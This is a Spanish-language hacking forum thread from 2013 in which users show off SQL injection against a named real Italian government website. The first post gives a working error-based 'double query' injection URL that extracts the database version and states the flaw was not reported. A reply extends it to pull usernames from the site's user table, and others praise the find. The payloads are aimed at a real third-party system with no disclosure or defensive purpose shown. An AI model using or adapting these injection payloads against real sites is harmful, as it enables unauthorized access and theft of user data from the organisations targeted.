Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Cronos en Junio 28, 2013, 03:30:05 pm

Título: SQLI Doble Query www.uibm.gov.it
Publicado por: Cronos en Junio 28, 2013, 03:30:05 pm
(http://i40.tinypic.com/2yor281.png)

SQL: http://www.uibm.gov.it/index.php?option=com_content&id=2006480' and (select 1 from (select count(*),concat(0x7e,version(),floor(rand(0)*2))a from information_schema.tables group by a)b) -- -

Reportado: No

Saludos,, Cronos.-
Título: Re:SQLI Doble Query www.uibm.gov.it
Publicado por: Muppet en Junio 28, 2013, 04:09:21 pm
Hola vengo a Completarla! Buen fallo cronos!

http://www.uibm.gov.it/index.php?option=com_content&id=2006480 and(select 1 from(select min(0),(select concat(0x7e,(select concat(username) from jos_users limit 0,1),0x7e,floor(rand(0)*2)))a from information_schema.tables group by a)b)

Título: Re:SQLI Doble Query www.uibm.gov.it
Publicado por: Cronos en Junio 28, 2013, 04:55:54 pm
Gracias bro :)
Título: Re:SQLI Doble Query www.uibm.gov.it
Publicado por: arthusu en Junio 28, 2013, 10:27:37 pm
Excelente Cronos aqui te va con union based :D XDDDDD salu2 buen post espero que sigas asi bro ^^

(http://i.imgur.com/FGjsn4b.png)

Le metiste <body>! <--- WTF? No es cierto hd_breaker xD